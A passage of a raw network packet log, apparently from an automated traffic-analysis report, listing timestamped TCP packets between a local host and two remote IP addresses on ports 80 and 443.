                                                                                                                                                                        Nov 21, 2024 10:37:46.345295906 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.345379114 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.345417023 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.346033096 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.346179962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.346218109 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.346978903 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.346997976 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.347039938 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.347349882 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.347906113 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.348018885 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.348053932 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.348851919 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.348917961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.348956108 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.349770069 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.349874020 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.349908113 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.350756884 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.350814104 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.350848913 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.351599932 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.351676941 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.351721048 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.353326082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.353499889 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.353512049 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.353524923 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.353543043 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.353569984 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.354362011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.354438066 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.354470968 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.355288982 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.355380058 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.355416059 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.356177092 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.356271029 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.356312990 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.356493950 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.357155085 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.357228041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.357260942 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.358031034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.358164072 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.358200073 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.358941078 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.359061003 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.359095097 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.359813929 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.374387980 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.383450031 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.512815952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.512945890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.513243914 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.513286114 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.513331890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.514180899 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.514226913 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.514225960 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.515081882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.515126944 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.515166998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.515202045 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.516010046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.516104937 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.516608000 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.516932964 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.517051935 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.517092943 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.517863035 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.517944098 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.518014908 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.518779993 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.518857956 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.519351959 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.519701004 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.519876957 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.519920111 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.520680904 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.520793915 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.520935059 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.521779060 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.522012949 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.522064924 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.522578001 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.522738934 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.522773027 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.523380041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.523503065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.523544073 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.524307013 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.524391890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.524429083 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.525226116 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.525330067 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.526138067 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.526189089 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.526309967 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.527096987 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.527138948 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.527139902 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.527173996 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.527998924 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.528115034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.528152943 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.529108047 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.529203892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.529247999 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.529831886 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.530004978 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.530052900 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.530757904 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.530813932 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.531707048 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.531757116 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.531794071 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.532583952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.532624960 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.532696962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.532736063 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.533550978 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.533612013 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.533651114 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.534501076 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.534607887 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.534645081 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.535356998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.535475969 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.535521984 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.536319017 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.536458969 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.536760092 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.537209988 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.537275076 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.537381887 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.538135052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.538242102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.538296938 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.539031029 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.539144993 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.539984941 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.540031910 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.540079117 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.540901899 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.540946960 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.540996075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.541039944 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.541815042 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.541923046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.541965961 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.542732000 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.542768955 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.542805910 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.543759108 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.543844938 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.543957949 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.544735909 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.544754028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.544856071 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.545510054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.545737982 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.545773029 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.546431065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.546559095 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.546658993 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.547348976 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.547408104 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.547641993 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.548249006 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.548372984 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.548433065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.549207926 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.549247980 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.549290895 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.549947977 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.550122976 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.550266027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.550304890 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.551059961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.551225901 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.551253080 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.552031994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.552191019 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.552226067 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.552881002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.553011894 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.553046942 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.553818941 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.553884983 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.553950071 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.554769993 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.554862976 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.555042028 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.555653095 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.555768013 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.556183100 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.556574106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.556591988 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.556637049 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.557512045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.557617903 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.557655096 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.558403969 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.558639050 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.558676958 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.559427023 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.559568882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.559621096 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.560477972 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.560553074 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.560659885 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.561119080 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.580672026 CET4434978913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.581440926 CET49789443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:46.581475019 CET4434978913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.581923962 CET49789443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:46.581940889 CET4434978913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.584666014 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.714451075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.714549065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.714643955 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.714658976 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.714728117 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.714770079 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.715517998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.715651989 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.715694904 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.716465950 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.716577053 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.716712952 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.717381954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.717489958 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.717542887 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.718286991 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.718389034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.718873024 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.719212055 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.719322920 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.719459057 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.720129013 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.720236063 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.720366001 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.721043110 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.721168041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.721213102 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.721999884 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.722054005 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.722223997 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.722903967 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.723022938 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.723150015 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.723812103 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.723922968 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.724015951 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.724735022 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.724819899 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.725029945 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.725198030 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.725694895 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.725809097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.725848913 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.726625919 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.726795912 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.726876020 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.727499008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.727636099 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.727902889 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.728411913 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.728508949 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.728554964 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.729324102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.729468107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.729513884 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.730247021 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.730395079 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.731053114 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.731225014 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.731319904 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.731409073 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.732119083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.732181072 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.732227087 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.733047009 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.733138084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.733180046 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.733980894 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.734117985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.734154940 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.734924078 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.734982967 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.735867977 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.735925913 CET4978780192.168.2.6185.215.113.16
